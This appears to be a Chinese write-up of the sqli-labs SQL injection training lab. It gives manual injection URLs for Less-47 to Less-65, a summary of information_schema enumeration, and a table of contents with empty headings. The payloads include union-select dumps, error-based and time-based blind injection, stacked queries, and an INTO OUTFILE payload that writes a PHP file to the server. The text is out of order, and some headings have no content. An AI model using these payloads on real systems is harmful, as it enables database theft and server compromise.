$sql = "SELECT * FROM users ORDER BY $id";

Less-47 - ORDER BY Clause-Error-Single quote

手动注入

http://127.0.0.1:8081/sqli-labs/Less-47/?sort=1'into outfile "文件地址"lines terminated by 0x3c3f70687020706870696e666f28293b3f3e2020--+

手动注入

布尔盲注、延时注入及对文件操作均可，除不能报错注入外同Less-46

手动注入

除不能报错注入外同Less-47

手动注入

http://127.0.0.1:8081/sqli-labs/Less-50/?sort=1;create table less50 like users

手动注入

http://127.0.0.1:8081/sqli-labs/Less-51/?sort=1';create table less51 like users--+

手动注入

http://127.0.0.1:8081/sqli-labs/Less-52/?sort=1;create table less52 like users

手动注入

http://127.0.0.1:8081/sqli-labs/Less-53/?sort=1';create table less53 like users--+

Page-4 (Challenges)

Less-54:Challenge-1

手动注入

#获取表名cul94axau9
http://127.0.0.1:8081/sqli-labs/Less-54/index.php?id=-1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'--+
#获取列名id,sessid,secret_B27K,tryy
http://127.0.0.1:8081/sqli-labs/Less-54/index.php?id=-1'union select 1,2,group_concat(column_name) from information_schema.columns where table_name='cul94axau9'--+
#获取答案
http://127.0.0.1:8081/sqli-labs/Less-54/index.php?id=-1'union select 1,2,group_concat(secret_B27K) from challenges.cul94axau9--+

Less-55:Challenge-2

手动注入

#获取表名k6cm9525rm
http://127.0.0.1:8081/sqli-labs/Less-55/index.php?id=-1)union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'--+
#获取列名id,sessid,secret_6TMN,tryy
http://127.0.0.1:8081/sqli-labs/Less-55/index.php?id=-1)union select 1,2,group_concat(column_name) from information_schema.columns where table_name='k6cm9525rm'--+
#获取答案
http://127.0.0.1:8081/sqli-labs/Less-55/index.php?id=-1)union select 1,2,group_concat(secret_6TMN) from challenges.k6cm9525rm--+

Less-56:Challenge-3

手动注入

本关使用('')处理输入

http://127.0.0.1:8081/sqli-labs/Less-56/?id=-1')union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'--+

源码分析

$sql="SELECT * FROM security.users WHERE id=('$id') LIMIT 0,1";

Less-57:Challenge-4

手动注入

本关使用""处理输入

http://127.0.0.1:8081/sqli-labs/Less-57/?id=-1"union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'--+

源码分析

$id= '"'.$id.'"';
// Querry DB to get the correct output
$sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";

Less-58:Challenge-5

手动注入

报错注入

http://127.0.0.1:8081/sqli-labs/Less-58/?id=-1'union select extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e))--+

Less-59:Challenge-6

手动注入

报错注入

http://127.0.0.1:8081/sqli-labs/Less-59/?id=-1 union select extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e))--+

源码分析

$sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";

Less-60:Challenge-7

手动注入

报错注入

http://127.0.0.1:8081/sqli-labs/Less-60/?id=-1")union select extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e))--+

源码分析

$id = '("'.$id.'")';
// Querry DB to get the correct output
$sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";

Less-61:Challenge-8

手动注入

报错注入

http://127.0.0.1:8081/sqli-labs/Less-61/?id=-1'))union select extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e))--+

源码分析

$sql="SELECT * FROM security.users WHERE id=(('$id')) LIMIT 0,1";

Less-62:Challenge-9

手动注入

延时注入（可以使用脚本）

http://127.0.0.1:8081/sqli-labs/Less-61/?id=1')and If(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))=79,0,sleep(10))--+

源码分析

$sql="SELECT * FROM security.users WHERE id=('$id') LIMIT 0,1";

Less-63:Challenge-10

手动注入

同Less-62，使用延时注入。

源码分析

$sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";

Less-64:Challenge-11

手动注入

同Less-62，使用延时注入。

源码分析

$sql="SELECT * FROM security.users WHERE id=(($id)) LIMIT 0,1";

Less-65:Challenge-12

手动注入

同Less-62，使用延时注入。

源码分析

$id = '"'.$id.'"';
// Querry DB to get the correct output
$sql="SELECT * FROM security.users WHERE id=($id) LIMIT 0,1";

常用方法总结

一般流程

Mysql 有一个系统数据库information_schema，存储着所有的数据库的相关信息，一般的，我们利用该表可以进行一次完整的注入。以下为一般的流程。

猜数据库

select schema_name from information_schema.schemata
select group_concat(schema_name) from information_schema.schemata
select 1,group_concat(schema_name),3 from information_schema.schemata

猜某库的数据表

select table_name from information_schema.tables where table_schema='xxxxx'
select group_concat(table_name) from information_schema.tables where table_schema='xxxxx'
select 1,group_concat(table_name),3 from information_schema.tables where table_schema='xxxxx'

猜某表的所有列

Select column_name from information_schema.columns where table_name='xxxxx'
select group_concat(column_name) from information_schema.columns where table_name='xxxxx'
select 1,group_concat(column_name),3 from information_schema.columns where table_name='xxxxx'

获取某列的内容

Select xxxx from xxxxxx

上述知识参考用例：less1-less4

sqli-labs 刷题记录

Page-1 (Basic Challenges)

Less-1 GET - Error based - Single quotes - String (基于错误的GET单引号字符型注入)

手动注入

源码分析

Less-2 GET - Error based - Intiger based (基于错误的GET整型注入)

手动注入

源码分析

Less-3 GET - Error based - Single quotes with twist string (基于错误的GET单引号变形字符型注入)

手动注入

源码分析

Less-4 GET - Error based - Double Quotes - String (基于错误的GET双引号字符型注入)

手动注入

源码分析

Less-5 GET - Double Injection - Single Quotes - String (双注入GET单引号字符型注入)

源码分析

布尔盲注

利用left()和length()函数获取版本号及库名

利用substr()和ascii()函数获取表名

利用regexp()函数获取列名字

利用ord()和mid()函数获取users 表的内容

报错注入

利用floor(rand(0)*2)进行报错注入

利用 double 数值类型超出范围进行报错注入

利用 bigint 溢出进行报错注入

利用xpath 函数报错注入

利用数据的重复性

延时注入

Less-6 GET - Double Injection - Double Quotes - String (双注入GET双引号字符型注入)

手动注入

源码分析

Less-7 GET - Dump into outfile - String （导出文件GET字符型注入）

源码分析

手动注入

Less-8 GET - Blind - Boolian Based - Single Quotes (布尔型单引号GET盲注)

手动注入

源码分析

Less-9 GET - Blind - Time based. - Single Quotes (基于时间的GET单引号盲注)

手动注入

源码分析

Less-10 GET - Blind - Time based - double quotes (基于时间的双引号盲注)

Less-11 POST - Error Based - Single quotes- String (基于错误的POST型单引号字符型注入)

手动注入

源码分析

Less-12 POST - Error Based - Double quotes- String-with twist (基于错误的双引号POST型字符型变形的注入)

手动注入

源码分析

Less-13 POST - Double Injection - Single quotes- String -twist (POST单引号变形双注入)

手动注入

源码分析

Less-14 POST - Double Injection - Single quotes- String -twist (POST单引号变形双注入)

手动注入

源码分析

less-15 POST - Blind- Boolian/time Based - Single quotes (基于bool型/时间延迟单引号POST型盲注)

手动注入

源码分析

Less-16 POST - Blind- Boolian/Time Based - Double quotes (基于bool型/时间延迟的双引号POST型盲注)

手动注入

源码分析

Less-17 POST - Update Query- Error Based - String (基于错误的更新查询POST注入)

手动注入

源码分析

函数简介

Less-18 POST - Header Injection - Uagent field - Error based (基于错误的用户代理，头部POST注入)

手动注入

源码分析

Less-19 POST - Header Injection - Referer field - Error based (基于头部的Referer POST报错注入)

手动注入

源码分析

Less-20 POST - Cookie injections - Uagent field - Error based (基于错误的cookie头部POST注入)

手动注入

源码分析

Less-21 Cookie Injection- Error Based- complex - string

手动注入

源码分析

Less-22 Cookie Injection- Error Based- Double Quotes - string (基于错误的双引号字符型Cookie注入)

手动注入

源码分析

Page-2 (Advanced Injections)

Less-23 GET - Error based - strip comments (基于错误的，过滤注释的GET型)